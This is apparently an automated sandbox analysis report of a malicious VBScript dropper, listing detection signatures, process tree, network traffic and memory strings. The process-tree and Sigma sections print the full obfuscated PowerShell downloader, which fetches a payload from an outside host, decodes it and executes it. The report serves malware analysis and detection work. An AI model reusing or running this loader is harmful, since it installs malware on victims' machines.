Edit tour

Windows Analysis Report
Sentinelled.vbs

Overview

General Information

Sample name:	Sentinelled.vbs
Analysis ID:	1579017
MD5:	b87b7f3da5d689399aa07d096ecda9bd
SHA1:	e07130e94480c9e9410a10c5a2cbaf05fd25bf99
SHA256:	1614ed95576305a4ebdc5dc8e3fdb09d5c48186f07388246363e1d23862b7bb3
Tags:	vbsuser-lowmal3
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

VBScript performs obfuscated calls to suspicious functions

Yara detected Powershell download and execute

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Potential malicious VBS script found (suspicious strings)

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript starts Powershell (via cmd or directly)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 4932 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Sentinelled.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

powershell.exe (PID: 2104 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Stenternstantiates; function Husking($Sicklemia){$Afmilitariseringers=4;$Stenter=$Afmilitariseringers;do{$Musikgruppens+=$Sicklemia[$Stenter];$Stenter+=5} until(!$Sicklemia[$Stenter])$Musikgruppens}function Batiker179($Folketingsvalgenes){ .($opsamlingsbeholdernes) ($Folketingsvalgenes)}$opsamlingsbeholderens=Husking ' trnForsEBomut Dep.SeddW';$opsamlingsbeholderens+=Husking ' VulEUn.uBKontCIn.eLPsamiSupeEafskNSr uT';$Loppier=Husking 'BystMDrifo H mz .aaiNonslevaclUn oaAbor/';$Jalousidramaet=Husking 'FintTVenll rudsR ff1 bo 2';$Mhorr='Mid [ RanN.nimES yntPrst.SlagsEmboEApanr mpVHelaIBecacTrefESanspSkopoBegoI SnoNCharT Va,mF skA C tN.ammaInd.gForbEStyrR Q t]Lyco:Modt:K.imsDismE arecManou Ta R VlgiInortAareyproepsynsrYeasO Sl Tenmao VolcLtero FulL Ver=D,ed$K.lejKameAEdlalLayeOAnd.upressDel,I KetdHoveRBragaBaadM intA Im EE ekT';$Loppier+=Husking 'Fi l5.omm.Desp0H ck Besk(PoliWFraniOv rn MocdAmfeo onw F,rsL nk KommNkiriTEsth ,lem1Slde0In v.Tu n0 Muf;Omga OstWNondiHummnSou 6Elsd4 Apo;Ster Pi,fxSlag6 Va.4Nons;Vent Euour Snav Gro:Hale1 Ent3.voi1 Ame.Bygg0Intr)a ve coauGAnileMenacFlarkPostoRubi/ Kon2tat 0L.co1Tell0,bor0Snar1Bytn0Tabu1 Sti MecFDemiiBundr Bile Emif fmoSporxglau/Pref1Regi3Met.1Age .soli0';$Nedslidendes=Husking '.ontUA.stSTeleEBlepR Mes-PedaA ColgDes,eBrnen HalT';$Kjerstines=Husking 'Arv hForvtOpirtBlodpMelusOrbi:Enea/Lang/VenuoOpalfSyst1F ktxHugu.AfskiUdrac hrouFi.d/EuphYYu ekSoigHFartf.edlh FrlYFl,sCArcaF.igh/ onsghentlKra iHa,daBek.dO tsiPrean ConeModesPs k.St.lpLabof S nb';$Unsighted=Husking ' Met>';$opsamlingsbeholdernes=Husking 'Pre ISelveInd x';$Besprinkle='Libertine';$Beskaaret='\Unmidwifed.Sur';Batiker179 (Husking 'skum$ShilGCit l Ek.o GraBChriaTabel Col:HoredEghorCwm.y yklaHjrnsAl.c= ata$ ShaE FisNTypeVCest:Ua sA.acePO.rypSk kD ResaErv TIncoAPse + obe$heydbVocaeTracS ,orktr.pAUncoa illRFakteNo rt');Batiker179 (Husking 'Agla$A,stgsurmL DisODirgB linAuntrLFred:sproZSkkeo Albl H raSkabeProesOnonQPaasuOdyse Scr=Is.m$NvneK m,ljAfsieSkdeRMiliSRh,nt ctuIRustnPaleENl.tS,egi.AppeS Di PFumel Inditextt W e(.tev$ChrouVikiNSkrisRefiiHandG himhTrilTDrosEV njdAsfa)');Batiker179 (Husking $Mhorr);$Kjerstines=$Zolaesque[0];$Unplacement=(Husking ' Tra$PersGSan.L ,erOHedeB Th a.eseLAcme:SutssSadeUAftenModeB BacU ErgrTuyeNDaliIAr hnChroG ft=.uttN ,orENumaWV lt-UretoGa vB vej posEDrilcWindtvejv F tesDextyInteS,itmTRetme Fi m Fag. Sol$SupeoS quPnonrSBawdAOrchmGoo l arcI .amn F,aG hrySTellBPur.EChurHD naoYeell,entd.inse KonRRe eeBrevNSviks');Batiker179 ($Unplacement);Batiker179 (Husking 'tes,$,ommSGarduEkstnInfobS yruKhivr itenPar,iDemin.ncegRumi. U.fHDemue.erla St dPersepyrrrCoinsKore[Slut$MarkNAfdaeshagdTotasTrkglL vpiShocdDo.ueUnannsab.dKense Udgs Fil]Fors=Phos$SoliL IsooGarnpAlloppro,iYel ekoder');$karotiner=Husking 'Naad$Dai SConvuacran MisbTip,u ByprFarlnEm ri MednN rogBa.n.al aDKremoun ewP ecnFeldlEggco steaModtdBillFConsiMesolNosoeSm d(Sere$Dis,KSrkej ReaeLingrCoxcs lert Ae iStn nPa oeTr gsLyci,Cher$M tzSManou OinrDammeSklmfVulpo Skeo geltAce e Culd Hak)';$Surefooted=$Dryas;Batiker179 (Husking ' and$ Nong S.nl Indo De BErhvA I plOpst:MongBG,adlBrugyRe fiKrsen leidLad,fSpida PotTNo rtThadeSnu =Unma(fo,fTDispEFondS RectSkov- SkvPChucAM totQuotHRotc F ol$UdstsSko u farRAnanEDigiF A roPa.moHistTt eaE ontDFlas)');while (!$Blyindfatte) {Batiker179 (Husking 'Zwe $BluegEks,la,teoBrndbIngmaTilgl re:An.mT ppoa rarl uftoequ.m odrLadyaFortaVmmedO taeTraur ignnFrusePolisIdea=An c$PhreHFestdLivmr Take Unhdaaree') ;Batiker179 $karotiner;Batiker179 (Husking 'Fe,es Br tG inAS raR KvaTZinz-G nnsUninLc teeOptaEcurapGrim Kadm4');Batiker179 (Husking 'Sulp$Dia,GBryslslago Su,B Frya V oLTorr:BallBDe,aL UnsYDuctIProfnS lod BerFHookATrtttTrant GraeEft =Tras(Po,iTLinge RygSTilbTProg- WilpLseha udfTWaveHStra Sola$ParasAn mUSnohrPatreCheeFDatiomo lOSlapt.eliEFrosD Eft)') ;Batiker179 (Husking 'Nota$ RusGAl ol Spoo Preb hiA Ek lUnfl:Un,aP RekLSl hASkanN ScoaStorrRe p=Drif$ProcG Rinl PyrODecibSemiaPortLBunk: FurS OveODispP R iHB usiSpriS GentRokkiAn icTordaMetatMicrE,fte1Labo9Silu2Atom+Mist+Fron%Bodo$.ozzZSpejO IntlUnhoa AbaE BrosSlinqNonpuBusbeSi n.PlascDa doBruguKlepn d sT') ;$Kjerstines=$Zolaesque[$planar]}$Anskueliggrelserne=278059;$Amanori=31395;Batiker179 (Husking ' Ban$Br aG T klHydroBr lbNamdAAbieLOpal:De nITr nsHypoO HalLPholEMargRCh tiAnstnVit GTimoSTe raForsR ,laBDif EStjeJbes DTra,e rawRPistEHintSCarb7La d3Alth Fleg=Ma,m AuntG ReseLandTluni-adrtc TiloCe,lnAltsTFa.tE De,nSol.T igl An $Al,eS riduExhaRFor egar FBiinoTee OAlphtTjaveDamed');Batiker179 (Husking 'Unin$Indeg HollstoroTottbYderaTig l itt:ForgAlamsc olcVoluoSndeu Br,c SidhCry eKureu helsSt peSt esu.de Be.e=Inte Tje[ZoopS ugiy S vsHelitUrnieNj gm.ldt.F,ibC agvoCarnnKonvvAdeleKlinr Thet Bef]Non :Mini:r giFF errKontoJuthmD acBB,taa Fj.s ense Raa6Synk4UnisSNi otTelerLiceiBy on Forg ype(Sp,c$ProdIIndesMe.aoLevelCha eCornrPersi ,ronLodzg Co s,ortaHyp rLizeb Tone RewjB acd iereBuryrTripeS.rasRati7Chef3 .to)');Batiker179 (Husking 'Doct$Koncg.lerL LiloFotoBGaraafemaLWond:ka,aE.tilN BartDarwRStoreIn uc elvhTim AIntetIrresMagn Kag=Stru Forb[T,uts S lYLntiSRipotBuldEafdam Fot.Kultt Ar EAccoxIntetShor.Wee e QuanBroacOleaoPer D iuiFervnG usG Co ]S,kk:Ravi:AfflA FrisVagtc HypIBeleIMedi. sydG TraeU,detLithsTabetStreRNonni,iagNPhycg Ros(Dipl$SomeAAfskCTov CCir OTilduNeshCMe,aHRusse NatUDekasRe.eE.elaS on)');Batiker179 (Husking ',ejo$SemiGMeteLSkrpOSynebPortAPa olMili:TricutrosNgummtstilIBeatnSuppKtroleAut rWorteEmuedTran=Cirk$CataETetrN itttZ rar TroEHvemCHandhDuctAIdiotIncoSF sf.trakSThinU Zo B insBr,dTOpmrRBisaiSpecnStelG.tyr( rus$Vensa I.tN rls ,onKMel.uDy oeUdm L K,uiSt eGGdniGRad RP,rlECompL.orkSRetteThyeRUngenSolde S.e,I lu$SolgaStrumH ovA BudnFre O U dRgra.IBrne)');Batiker179 $Untinkered;" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: powershell.exe PID: 2104	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 2104	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x5b948:$b2: ::FromBase64String( 0x5b984:$b2: ::FromBase64String( 0x5b9c1:$b2: ::FromBase64String( 0x5b9ff:$b2: ::FromBase64String( 0x5ba3e:$b2: ::FromBase64String( 0x5ba7e:$b2: ::FromBase64String( 0x5babf:$b2: ::FromBase64String( 0x5bb01:$b2: ::FromBase64String( 0x5bb44:$b2: ::FromBase64String( 0x5bb88:$b2: ::FromBase64String( 0x5bbcd:$b2: ::FromBase64String( 0x5bc13:$b2: ::FromBase64String( 0x5bc5a:$b2: ::FromBase64String( 0x5bca2:$b2: ::FromBase64String( 0x5bceb:$b2: ::FromBase64String( 0x5bd35:$b2: ::FromBase64String( 0x5bd80:$b2: ::FromBase64String( 0x5bdcc:$b2: ::FromBase64String( 0x5be19:$b2: ::FromBase64String( 0x5be67:$b2: ::FromBase64String( 0x5beb6:$b2: ::FromBase64String(

Other

Source	Rule	Description	Author	Strings
amsi64_2104.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi64_2104.amsi.csv	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xfb7b:$b2: ::FromBase64String( 0xcf04:$s1: -join 0x66b0:$s4: += 0x6772:$s4: += 0xa999:$s4: += 0xcab6:$s4: += 0xcda0:$s4: += 0xcee6:$s4: += 0xf27d:$s4: += 0xf2fd:$s4: += 0xf3c3:$s4: += 0xf443:$s4: += 0xf619:$s4: += 0xf69d:$s4: += 0xd713:$e4: Get-WmiObject 0xd902:$e4: Get-Process 0xd95a:$e4: Start-Process

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Sentinelled.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Sentinelled.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Sentinelled.vbs", ProcessId: 4932, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Sentinelled.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Sentinelled.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Sentinelled.vbs", ProcessId: 4932, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Stenternstantiates; function Husking($Sicklemia){$Afmilitariseringers=4;$Stenter=$Afmilitariseringers;do{$Musikgruppens+=$Sicklemia[$Stenter];$Stenter+=5} until(!$Sicklemia[$Stenter])$Musikgruppens}function Batiker179($Folketingsvalgenes){ .($opsamlingsbeholdernes) ($Folketingsvalgenes)}$opsamlingsbeholderens=Husking ' trnForsEBomut Dep.SeddW';$opsamlingsbeholderens+=Husking ' VulEUn.uBKontCIn.eLPsamiSupeEafskNSr uT';$Loppier=Husking 'BystMDrifo H mz .aaiNonslevaclUn oaAbor/';$Jalousidramaet=Husking 'FintTVenll rudsR ff1 bo 2';$Mhorr='Mid [ RanN.nimES yntPrst.SlagsEmboEApanr mpVHelaIBecacTrefESanspSkopoBegoI SnoNCharT Va,mF skA C tN.ammaInd.gForbEStyrR Q t]Lyco:Modt:K.imsDismE arecManou Ta R VlgiInortAareyproepsynsrYeasO Sl Tenmao VolcLtero FulL Ver=D,ed$K.lejKameAEdlalLayeOAnd.upressDel,I KetdHoveRBragaBaadM intA Im EE ekT';$Loppier+=Husking 'Fi l5.omm.Desp0H ck Besk(PoliWFraniOv rn MocdAmfeo onw F,rsL nk KommNkiriTEsth ,lem1Slde0In v.Tu n0 Muf;Omga OstWNondiHummnSou 6Elsd4 Apo;Ster Pi,fxSlag6 Va.4Nons;Vent Euour Snav Gro:Hale1 Ent3.voi1 Ame.Bygg0Intr)a ve coauGAnileMenacFlarkPostoRubi/ Kon2tat 0L.co1Tell0,bor0Snar1Bytn0Tabu1 Sti MecFDemiiBundr Bile Emif fmoSporxglau/Pref1Regi3Met.1Age .soli0';$Nedslidendes=Husking '.ontUA.stSTeleEBlepR Mes-PedaA ColgDes,eBrnen HalT';$Kjerstines=Husking 'Arv hForvtOpirtBlodpMelusOrbi:Enea/Lang/VenuoOpalfSyst1F ktxHugu.AfskiUdrac hrouFi.d/EuphYYu ekSoigHFartf.edlh FrlYFl,sCArcaF.igh/ onsghentlKra iHa,daBek.dO tsiPrean ConeModesPs k.St.lpLabof S nb';$Unsighted=Husking ' Met>';$opsamlingsbeholdernes=Husking 'Pre ISelveInd x';$Besprinkle='Libertine';$Beskaaret='\Unmidwifed.Sur';Batiker179 (Husking 'skum$ShilGCit l Ek.o GraBChriaTabel Col:HoredEghorCwm.y yklaHjrnsAl.c= ata$ ShaE FisNTypeVCest:Ua sA.acePO.rypSk kD ResaErv TIncoAPse + obe$heydbVocaeTracS ,orktr.pAUncoa illRFakteNo rt');Batiker179 (Husking 'Agla$A,stgsurmL DisODirgB linAuntrLFred:sproZSkkeo Albl H raSkabeProesOnonQPaasuOdyse Scr=Is.m$NvneK m,ljAfsieSkdeRMiliSRh,nt ctuIRustnPaleENl.tS,egi.AppeS Di PFumel Inditextt W e(.tev$ChrouVikiNSkrisRefiiHandG himhTrilTDrosEV njdAsfa)');Batiker179 (Husking $Mhorr);$Kjerstines=$Zolaesque[0];$Unplacement=(Husking ' Tra$PersGSan.L ,erOHedeB Th a.eseLAcme:SutssSadeUAftenModeB BacU ErgrTuyeNDaliIAr hnChroG ft=.uttN ,orENumaWV lt-UretoGa vB vej posEDrilcWindtvejv F tesDextyInteS,itmTRetme Fi m Fag. Sol$SupeoS quPnonrSBawdAOrchmGoo l arcI .amn F,aG hrySTellBPur.EChurHD naoYeell,entd.inse KonRRe eeBrevNSviks');Batiker179 ($Unplacement);Batiker179 (Husking 'tes,$,ommSGarduEkstnInfobS yruKhivr itenPar,iDemin.ncegRumi. U.fHDemue.erla St dPersepyrrrCoinsKore[Slut$MarkNAfdaeshagdTotasTrkglL vpiShocdDo.ueUnannsab.dKense Udgs Fil]Fors=Phos$SoliL IsooGarnpAlloppro,iYel ekoder');$karotiner=Husking 'Naad$Dai SConvuacran MisbTip,u ByprFarlnEm ri MednN rogBa.n.al aDKremoun ewP ecnFeldlEggco steaModtdBillFConsiMesolNosoeSm d(Sere$Dis,KSrkej ReaeLingrCoxcs

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-20T17:42:35.967540+0100	2803305	3	Unknown Traffic	192.168.2.7	49702	104.21.86.72	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Sentinelled.vbs

ReversingLabs: Detection: 18%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Source: unknown	HTTPS traffic detected: 104.21.86.72:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.110:443 -> 192.168.2.7:49704 version: TLS 1.2

Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.1777092431.000001CBA460C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32`e\ source: powershell.exe, 00000002.00000002.1778189960.000001CBA4790000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000002.00000002.1778189960.000001CBA4790000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdb source: powershell.exe, 00000002.00000002.1778189960.000001CBA47F1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: notepad.pdbGCTL source: wscript.exe, 00000001.00000003.1513781975.000002B3C7361000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519808236.000002B3C7561000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bpdbtem.pdb source: powershell.exe, 00000002.00000002.1777827302.000001CBA464F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.1778189960.000001CBA4790000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000002.00000002.1778189960.000001CBA47F1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ib.pdb source: powershell.exe, 00000002.00000002.1778189960.000001CBA47F1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ll\mscorlib.pdb source: powershell.exe, 00000002.00000002.1778189960.000001CBA47F1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.1778189960.000001CBA4790000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: global traffic	HTTP traffic detected: GET /YkHfhYCF/gliadines.pfb HTTP/1.1Host: of1x.icu
Source: global traffic	HTTP traffic detected: GET /watch?v=oHg5SJYRHA0 HTTP/1.1Host: www.youtube.comConnection: Keep-Alive

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic

Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49702 -> 104.21.86.72:443

Source: global traffic

HTTP traffic detected: GET /YkHfhYCF/gliadines.pfb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: of1x.icuConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /YkHfhYCF/gliadines.pfb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: of1x.icuConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /YkHfhYCF/gliadines.pfb HTTP/1.1Host: of1x.icu
Source: global traffic	HTTP traffic detected: GET /watch?v=oHg5SJYRHA0 HTTP/1.1Host: www.youtube.comConnection: Keep-Alive

Source: powershell.exe, 00000002.00000002.1743791119.000001CB8DE2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: &www.youtube.com equals www.youtube.com (Youtube)
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8C6CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8E254000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8C5D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: +https://www.youtube.com/watch?v=oHg5SJYRHA0 equals www.youtube.com (Youtube)
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8E254000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 1Host: www.youtube.com equals www.youtube.com (Youtube)
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8E254000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8DE19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ;www.youtube.com:443 equals www.youtube.com (Youtube)
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8C6E1000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: </script><script nonce="nAc2EUZbnz1lwNgXJC1-PA">(function() {var element = document.querySelector('#player-api'); if (yt && yt.flexy && yt.flexy.setPlayerlikeElementSize && typeof yt.flexy.setPlayerlikeElementSize === 'function') {yt.flexy.setPlayerlikeElementSize(element);}})();</script><script src="https://www.youtube.com/s/desktop/c01ea7e3/jsbin/spf.vflset/spf.js" nonce="nAc2EUZbnz1lwNgXJC1-PA"></script><script nonce="nAc2EUZbnz1lwNgXJC1-PA">if(window["_spf_state"])window["_spf_state"].config={"assume-all-json-requests-chunked":true}; equals www.youtube.com (Youtube)
Source: Unmidwifed.Sur.2.dr	String found in binary or memory: </script><script nonce="nAc2EUZbnz1lwNgXJC1-PA">(function() {var img = new Image().src = "https://i.ytimg.com/generate_204";})();</script><script src="https://www.youtube.com/s/desktop/c01ea7e3/jsbin/web-animations-next-lite.min.vflset/web-animations-next-lite.min.js" nonce="nAc2EUZbnz1lwNgXJC1-PA"></script><script src="https://www.youtube.com/s/desktop/c01ea7e3/jsbin/webcomponents-all-noPatch.vflset/webcomponents-all-noPatch.js" nonce="nAc2EUZbnz1lwNgXJC1-PA"></script><script src="https://www.youtube.com/s/desktop/c01ea7e3/jsbin/fetch-polyfill.vflset/fetch-polyfill.js" nonce="nAc2EUZbnz1lwNgXJC1-PA"></script><script src="https://www.youtube.com/s/desktop/c01ea7e3/jsbin/intersection-observer.min.vflset/intersection-observer.min.js" nonce="nAc2EUZbnz1lwNgXJC1-PA"></script><script nonce="nAc2EUZbnz1lwNgXJC1-PA">if (window.ytcsi) {window.ytcsi.tick('lpcs', null, '');}</script><script nonce="nAc2EUZbnz1lwNgXJC1-PA">(function() {window.ytplayer={}; equals www.youtube.com (Youtube)
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8E254000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Host: www.youtube.com equals www.youtube.com (Youtube)
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8C5B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8DDF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Host: www.youtube.com equals www.youtube.com (Youtube)
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8C5CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8DE2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8C5CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Location: https://www.youtube.com/watch?v=oHg5SJYRHA0 equals www.youtube.com (Youtube)
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8DE2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.com equals www.youtube.com (Youtube)
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8C5D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8DE19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com equals www.youtube.com (Youtube)
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8E254000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com` equals www.youtube.com (Youtube)
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8C9F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stack.replace(/https:\/\/www.youtube.com\//g,"");if(replaced.match(/https?:\/\/[^/]+\//))thirdPartyScript= true;else if(stack.indexOf("trapProp")>=0&&stack.indexOf("trapChain")>=0)thirdPartyScript=true;else if(message.indexOf("redefine non-configurable")>=0)thirdPartyScript=true;var baseUrl=window["ytcfg"].get("EMERGENCY_BASE_URL","https://www.youtube.com/error_204?t=jserror&level=ERROR");var unsupported=message.indexOf("window.customElements is undefined")>=0;if(thirdPartyScript\|\|unsupported)baseUrl=baseUrl.replace("level=ERROR","level=WARNING");var parts=[baseUrl];var key;for(key in values){var value= values[key];if(value)parts.push(key+"="+encodeURIComponent(value))}img.src=parts.join("&")}; (function(){function _getExtendedNativePrototype(tag){var p=this._nativePrototypes[tag];if(!p){p=Object.create(this.getNativePrototype(tag));var p$=Object.getOwnPropertyNames(window["Polymer"].Base);var i=0;var n=void 0;for(;i<p$.length&&(n=p$[i]);i++)if(!window["Polymer"].BaseDescriptors[n])try{p[n]=window["Polymer"].Base[n]}catch(e){throw new Error("Error while copying property: "+n+". Tag is "+tag);}try{Object.defineProperties(p,window["Polymer"].BaseDescriptors)}catch(e){throw new Error("Polymer define property failed for "+ Object.keys(p));}this._nativePrototypes[tag]=p}return p}function handlePolymerError(msg){window.onerror(msg,window.location.href,0,0,new Error(Array.prototype.join.call(arguments,",")))}var origPolymer=window["Polymer"];var newPolymer=function(config){if(!origPolymer._ytIntercepted&&window["Polymer"].Base){origPolymer._ytIntercepted=true;window["Polymer"].Base._getExtendedNativePrototype=_getExtendedNativePrototype;window["Polymer"].Base._error=handlePolymerError;window["Polymer"].Base._warn=handlePolymerError}return origPolymer.apply(this, arguments)};var origDescriptor=Object.getOwnPropertyDescriptor(window,"Polymer");Object.defineProperty(window,"Polymer",{set:function(p){if(origDescriptor&&origDescriptor.set&&origDescriptor.get){origDescriptor.set(p);origPolymer=origDescriptor.get()}else origPolymer=p;if(typeof origPolymer==="function")Object.defineProperty(window,"Polymer",{value:origPolymer,configurable:true,enumerable:true,writable:true})},get:function(){return typeof origPolymer==="function"?newPolymer:origPolymer},configurable:true, enumerable:true})})();}).call(this); </script><script nonce="nAc2EUZbnz1lwNgXJC1-PA">window.Polymer=window.Polymer\|\|{};window.Polymer.legacyOptimizations=true;window.Polymer.setPassiveTouchGestures=true;window.ShadyDOM={force:true,preferPerformance:true,noPatch:true}; wind equals www.youtube.com (Youtube)
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8C6E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stack.replace(/https:\/\/www.youtube.com\//g,"");if(replaced.match(/https?:\/\/[^/]+\//))thirdPartyScript= true;else if(stack.indexOf("trapProp")>=0&&stack.indexOf("trapChain")>=0)thirdPartyScript=true;else if(message.indexOf("redefine non-configurable")>=0)thirdPartyScript=true;var baseUrl=window["ytcfg"].get("EMERGENCY_BASE_URL","https://www.youtube.com/error_204?t=jserror&level=ERROR");var unsupported=message.indexOf("window.customElements is undefined")>=0;if(thirdPartyScript\|\|unsupported)baseUrl=baseUrl.replace("level=ERROR","level=WARNING");var parts=[baseUrl];var key;for(key in values){var value= values[key];if(value)parts.push(key+"="+encodeURIComponent(value))}img.src=parts.join("&")}; (function(){function _getExtendedNativePrototype(tag){var p=this._nativePrototypes[tag];if(!p){p=Object.create(this.getNativePrototype(tag));var 